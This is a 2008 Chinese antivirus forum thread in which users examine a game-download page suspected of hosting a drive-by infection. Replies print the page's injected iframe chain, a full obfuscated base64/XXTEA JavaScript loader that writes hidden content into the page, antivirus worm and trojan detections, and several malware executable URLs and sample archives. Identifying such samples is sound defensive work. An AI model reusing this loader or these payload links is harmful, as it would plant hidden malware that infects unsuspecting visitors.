查看: 10456|回复: 14
收起左侧

[已鉴定] 可疑网址

 关闭 [复制链接]
tracydk
发表于 2008-9-20 21:56:03 | 显示全部楼层 |阅读模式
似乎有毒 想来下寂静岭3的

PS:奇怪了,BTCHINA上的寂静岭3不能玩


http://download.tkgame.com/down/pcgame/act/2006-07-14/545.html
change_018
发表于 2008-9-20 22:07:26 | 显示全部楼层
卡巴进去没什么反应

几百M的寂静岭是试玩版的
正式的寂静岭3起码2个G左右 我下过
ahzsmzkf
发表于 2008-9-20 22:33:40 | 显示全部楼层
小a 果然报了
molicn
发表于 2008-9-20 22:34:56 | 显示全部楼层
我来看看 挂马
Log is generated by FreShow.
[wide]http://download.tkgame.com/down/pcgame/act/2006-07-14/545.html
    [script]http://bbs1.tkgame.com/js/dvbbs.js
    [script]http://download.tkgame.com/img/nav_over.js
       [frame]http://gggggre.cn/007/zz.htm
            [frame]http://gggggre.cn/007/123.htm

            [script]http://js.users.51.la/2134416.js
    [script]http://www3.tkgame.com/JS/download_01_680x60.js
    [script]http://download.tkgame.com/e/public/ViewClick?classid=110&id=545
    [script]http://www3.tkgame.com/JS/download_04_230x210.js
    [script]http://download.tkgame.com/e/public/onclick?enews=donews&classid=110&id=545
    [script]http://tkbd1.tkgame.com/count/mystat.asp?siteid=6

这段我不会解
function utf8to16(str){var out,i,len,c;var char2,char3;out=[];len=str.length;i=0;while(i<len){c=str.charCodeAt(i++);switch(c>>4){case 0:case 1:case 2:case 3:case 4:case 5:case 6:case 7:out[out.length]=str.charAt(i-1);break;case 12:case 13:char2=str.charCodeAt(i++);out[out.length]=String.fromCharCode(((c&0x1F)<<6)|(char2&0x3F));break;case 14:char2=str.charCodeAt(i++);char3=str.charCodeAt(i++);out[out.length]=String.fromCharCode(((c&0x0F)<<12)|((char2&0x3F)<<6)|((char3&0x3F)<<0));break}}return out.join('')}var base64DecodeChars=new Array(-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,62,-1,-1,-1,63,52,53,54,55,56,57,58,59,60,61,-1,-1,-1,-1,-1,-1,-1,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,-1,-1,-1,-1,-1,-1,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,-1,-1,-1,-1,-1);function base64decode(str){var c1,c2,c3,c4;var i,len,out;len=str.length;i=0;out="";while(i<len){do{c1=base64DecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c1==-1);if(c1==-1)break;do{c2=base64DecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c2==-1);if(c2==-1)break;out+=String.fromCharCode((c1<<2)|((c2&0x30)>>4));do{c3=str.charCodeAt(i++)&0xff;if(c3==61)return out;c3=base64DecodeChars[c3]}while(i<len&&c3==-1);if(c3==-1)break;out+=String.fromCharCode(((c2&0XF)<<4)|((c3&0x3C)>>2));do{c4=str.charCodeAt(i++)&0xff;if(c4==61)return out;c4=base64DecodeChars[c4]}while(i<len&&c4==-1);if(c4==-1)break;out+=String.fromCharCode(((c3&0x03)<<6)|c4)}return out}function long2str(v,w){var vl=v.length;var sl=v[vl-1]&0xffffffff;for(var i=0;i<vl;i++){v=String.fromCharCode(v&0xff,v>>>8&0xff,v>>>16&0xff,v>>>24&0xff)}if(w){return v.join('').substring(0,sl)}else{return v.join('')}}function str2long(s,w){var len=s.length;var v=[];for(var i=0;i<len;i+=4){v[i>>2]=s.charCodeAt(i)|s.charCodeAt(i+1)<<8|s.charCodeAt(i+2)<<16|s.charCodeAt(i+3)<<24}if(w){v[v.length]=len}return v}function xxtea_decrypt(str,key){if(str==""){return""}var v=str2long(str,false);var k=str2long(key,false);var n=v.length-1;var z=v[n-1],y=v[0],delta=0x9E3779B9;var mx,e,q=Math.floor(6+52/(n+1)),sum=q*delta&0xffffffff;while(sum!=0){e=sum>>>2&3;for(var p=n;p>0;p--){z=v[p-1];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[p]=v[p]-mx&0xffffffff}z=v[n];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[0]=v[0]-mx&0xffffffff;sum=sum-delta&0xffffffff}return long2str(v,true)}t="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";t=utf8to16(xxtea_decrypt(base64decode(t),'7a'));document.write(t);

[ 本帖最后由 molicn 于 2008-9-20 22:38 编辑 ]
tracydk
 楼主| 发表于 2008-9-20 22:37:24 | 显示全部楼层

回复 4楼 molicn 的帖子

把东西发上来
tracydk
 楼主| 发表于 2008-9-20 22:51:17 | 显示全部楼层
晚上没人啊
shmily512099
发表于 2008-9-20 23:55:13 | 显示全部楼层
进去后 微点告诉我

蠕虫名称:Worm.Win32.AutoRun.gki

程序:
F:\TEMPORARY INTERNET FILES\CONTENT.IE5\NQ87F10P\0001[1].EXE
是蠕虫程序!
已成功阻止其运行,是否要删除此文件?

蠕虫名称:Worm.Win32.AutoRun.gki

程序:
C:\DOCUMENTS AND SETTINGS\LOLITA\LOCAL SETTINGS\TEMP\IOS.EXE
是蠕虫程序!
已成功阻止其运行,是否要删除此文件?
granthill
发表于 2008-9-21 10:46:43 | 显示全部楼层
http://gggggre.cn/0001.exe


avast!    Win32:Agent-SIM [Trj]

http://www.net-ddos.com/youxi/shengji.exe
http://www.net-ddos.com/youxi/weiai.exe
http://www.net-ddos.com/youxi/zj.exe

[ 本帖最后由 granthill 于 2008-9-21 11:05 编辑 ]

0001.rar

34.31 KB, 下载次数: 108

virus.rar

102.52 KB, 下载次数: 116

20080808
发表于 2008-9-21 11:57:50 | 显示全部楼层
小红伞报了
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-17 05:53 , Processed in 0.141929 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表